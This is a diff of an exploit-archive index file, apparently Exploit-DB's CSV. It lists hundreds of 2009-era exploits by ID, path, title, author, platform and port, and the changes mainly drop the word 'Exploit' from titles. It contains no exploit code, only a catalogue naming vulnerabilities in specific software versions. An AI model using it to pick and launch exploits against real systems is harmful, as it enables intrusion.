9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 @@ -8721,17 +8722,17 @@ id,file,description,date,author,platform,type,port 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 -9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OS X) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 +9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0 -9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 +9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0 -9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 +9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash",2009-07-24,Hong10,windows,dos,0 9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (2)",2009-07-24,skys,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 -9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 +9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 - (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 @@ -8764,7 +8765,7 @@ id,file,description,date,author,platform,type,port 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 -9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow Exploit (SEH)",2009-07-28,Koshi,windows,local,0 +9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 @@ -8776,13 +8777,13 @@ id,file,description,date,author,platform,type,port 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service (PoC)",2009-07-30,kingcope,multiple,dos,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,linux,local,0 -9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f - smb:// URI Handling Remote Buffer Overflow Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 -9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash Exploit",2009-07-30,LiquidWorm,windows,dos,0 +9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f - smb:// URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",windows,remote,0 +9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash",2009-07-30,LiquidWorm,windows,dos,0 9305,platforms/windows/local/9305.txt,"EPSON Status Monitor 3 - Privilege Escalation",2009-07-30,Nine:Situations:Group,windows,local,0 9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 libc - MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local,0 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure",2009-07-30,GoLd_M,php,webapps,0 9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - (fs_jVroot) Remote File Inclusion",2009-07-30,SirGod,php,webapps,0 -9309,platforms/php/webapps/9309.txt,"orbis CMS 1.0 - (File Delete/Download File / File Upload / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9309,platforms/php/webapps/9309.txt,"orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 @@ -8791,8 +8792,8 @@ id,file,description,date,author,platform,type,port 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - '.skp' Remote Stack Overflow (PoC)",2009-08-01,LiquidWorm,windows,dos,0 -9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f - smb:// URI Handling Remote Buffer Overflow Exploit (Universal)",2009-07-31,His0k4,windows,remote,0 -9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow Exploit",2009-08-01,Bruk0ut,windows,remote,30000 +9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f - smb:// URI Handling Remote Buffer Overflow (Universal)",2009-07-31,His0k4,windows,remote,0 +9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow",2009-08-01,Bruk0ut,windows,remote,30000 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) SQL Injection",2009-08-01,rEcruit,php,webapps,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0 @@ -8803,7 +8804,7 @@ id,file,description,date,author,platform,type,port 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0 9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,windows,local,0 -9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser - (defer) Remote Buffer Overflow Exploit (SEH)",2009-08-03,His0k4,windows,remote,0 +9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser - (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 @@ -8825,7 +8826,7 @@ id,file,description,date,author,platform,type,port 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 -9352,platforms/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 +9352,platforms/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure",2009-08-04,"Jon Oberheide",linux,local,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9354,platforms/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 @@ -8833,10 +8834,10 @@ id,file,description,date,author,platform,type,port 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,windows,dos,0 -9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 +9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos,0 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)",2009-08-05,schnuddelbuddel,windows,dos,0 -9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 +9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",linux,local,0 9364,platforms/windows/local/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,local,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 @@ -8849,7 +8850,7 @@ id,file,description,date,author,platform,type,port 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - '.m3u' Universal Stack Overflow (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0 -9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow Exploit (SEH)",2009-08-06,hack4love,windows,local,0 +9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)",2009-08-06,hack4love,windows,local,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,windows,local,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 @@ -8871,25 +8872,25 @@ id,file,description,date,author,platform,type,port 9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 -9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 +9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps,0 -9409,platforms/windows/local/9409.pl,"Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow Exploit (SEH)",2009-08-10,hack4love,windows,local,0 +9409,platforms/windows/local/9409.pl,"Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow (SEH)",2009-08-10,hack4love,windows,local,0 9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (1)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 -9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 +9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' BSOD Crash",2009-08-11,webDEViL,windows,dos,0 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - 'gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote,0 -9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 +9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injections",2009-08-12,"Sense of Security",php,webapps,0 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution",2009-08-12,IHTeam,php,webapps,0 9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow",2009-08-13,zec,windows,local,0 @@ -8920,8 +8921,8 @@ id,file,description,date,author,platform,type,port 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 -9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 -9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin User",2009-08-18,SuNHouSe2,hardware,remote,0 +9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 +9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - '.xpl' Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 @@ -8933,7 +8934,7 @@ id,file,description,date,author,platform,type,port 9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps,0 9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local,0 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0 -9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow Exploit",2009-08-18,Wraith,windows,remote,69 +9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2009-08-18,Wraith,windows,remote,69 9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 @@ -8948,12 +8949,12 @@ id,file,description,date,author,platform,type,port 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 -9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 +9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 9484,platforms/php/webapps/9484.txt,"PHP Dir Submit - (aid) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9485,platforms/php/webapps/9485.txt,"Cuteflow 2.10.3 - edituser.php Security Bypass",2009-08-24,"Hever Costa Rocha",php,webapps,0 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-24,hack4love,windows,dos,0 -9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - kqueue() NULL pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 +9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - kqueue() Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems - setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0 9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0 @@ -8966,7 +8967,7 @@ id,file,description,date,author,platform,type,port 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0 9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0 -9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 +9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)",2009-08-24,mr_me,windows,local,0 9502,platforms/php/webapps/9502.txt,"Joomla Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 9504,platforms/php/webapps/9504.txt,"Joomla Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 @@ -8984,9 +8985,9 @@ id,file,description,date,author,platform,type,port 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 -9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow Exploit (SEH)",2009-08-25,hack4love,windows,local,0 +9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 -9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0 +9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion",2009-08-26,"cr4wl3r ",php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 @@ -9004,17 +9005,17 @@ id,file,description,date,author,platform,type,port 9537,platforms/windows/dos/9537.htm,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",windows,dos,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0 -9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0 +9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 -9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0 +9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0 9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",windows,dos,0 -9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow Exploit (SEH)",2009-08-31,hack4love,windows,local,0 +9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local,0 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail 